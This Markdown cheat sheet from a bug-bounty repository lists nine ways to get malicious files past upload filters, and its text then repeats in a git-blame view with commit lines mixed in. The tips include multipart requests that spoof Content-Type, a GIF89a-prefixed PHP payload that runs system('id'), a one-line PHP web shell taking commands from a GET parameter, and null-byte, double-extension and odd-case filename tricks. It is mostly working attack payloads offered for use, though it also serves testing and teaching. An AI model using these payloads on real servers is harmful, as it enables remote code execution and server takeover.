AllAboutBugBounty/Arbitrary File Upload.md

# Arbitrary File Upload

## Introduction
An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.

## Where to find
In upload file feature, for example upload photo profile feature

## How to exploit
1. Change the `Content-Type` value
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```
Change the Content-Type
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
```

2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
```
Change the request to this
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
```

3. Upload the payload, but start with GIF89a; and
```
POST /images/upload/ HTTP/1.1
Host: target.com
...

---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif

GIF89a; <?php system("id") ?>
```
And dont forget to change the content-type to image/gif

4. Bypass content length validation, it can be bypassed using small payload
```
(<?=`$_GET[x]`?>)
```

5. Using null byte in filename
```
file.php%00.gif
```

6. Using double extensions for the uploaded file
```
file.jpg.php
```

7.  Uploading an unpopular php extensions (php4,php5,php6,phtml)
```
file.php5
```

8. Try to randomly capitalizes the file extension
```
file.pHP5
```

9. Mix the tips!
Add 'Where to find' in each readme, add Apache + CRLF + RFI 2022-06-22 04:41:21 +00:00			`# Arbitrary File Upload`

			`## Introduction`
			`An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.`

			`## Where to find`
			`In upload file feature, for example upload photo profile feature`

			`## How to exploit`
			1. Change the `Content-Type` value
Bypass File Upload [1] Add bypass file upload tips and add 9 tips 2020-09-25 23:31:06 +00:00			```
			`POST /images/upload/ HTTP/1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass File Upload [1] Add bypass file upload tips and add 9 tips 2020-09-25 23:31:06 +00:00
			`---------------------------829348923824`
			`Content-Disposition: form-data; name="uploaded"; filename="dapos.php"`
			`Content-Type: application/x-php`
			```
			`Change the Content-Type`
			```
			`POST /images/upload/ HTTP/1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass File Upload [1] Add bypass file upload tips and add 9 tips 2020-09-25 23:31:06 +00:00
			`---------------------------829348923824`
			`Content-Disposition: form-data; name="uploaded"; filename="dapos.php"`
			`Content-Type: image/jpeg`
			```

			`2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file`
			```
			`POST /images/upload/ HTTP/1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass File Upload [1] Add bypass file upload tips and add 9 tips 2020-09-25 23:31:06 +00:00
			`---------------------------829348923824`
			`Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"`
			`Content-Type: application/x-php`
			```
			`Change the request to this`
			```
			`POST /images/upload/ HTTP/1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass File Upload [1] Add bypass file upload tips and add 9 tips 2020-09-25 23:31:06 +00:00
			`---------------------------829348923824`
			`Content-Disposition: form-data; name="uploaded"; filename="dapos.php"`
			`Content-Type: application/x-php`
			```

			`3. Upload the payload, but start with GIF89a; and`
			```
			`POST /images/upload/ HTTP/1.1`
			`Host: target.com`
Added Joomla and SSRF, and doing some major changes 2022-07-09 15:35:32 +00:00			`...`
Bypass File Upload [1] Add bypass file upload tips and add 9 tips 2020-09-25 23:31:06 +00:00
			`---------------------------829348923824`
			`Content-Disposition: form-data; name="uploaded"; filename="dapos.php"`
			`Content-Type: image/gif`

			`GIF89a; <?php system("id") ?>`
			```
			`And dont forget to change the content-type to image/gif`

			`4. Bypass content length validation, it can be bypassed using small payload`
			```
			(<?=`$_GET[x]`?>)
			```

			`5. Using null byte in filename`
			```
			`file.php%00.gif`
			```

			`6. Using double extensions for the uploaded file`
			```
			`file.jpg.php`
			```

			`7. Uploading an unpopular php extensions (php4,php5,php6,phtml)`
			```
			`file.php5`
			```

			`8. Try to randomly capitalizes the file extension`
			```
			`file.pHP5`
			```

			`9. Mix the tips!`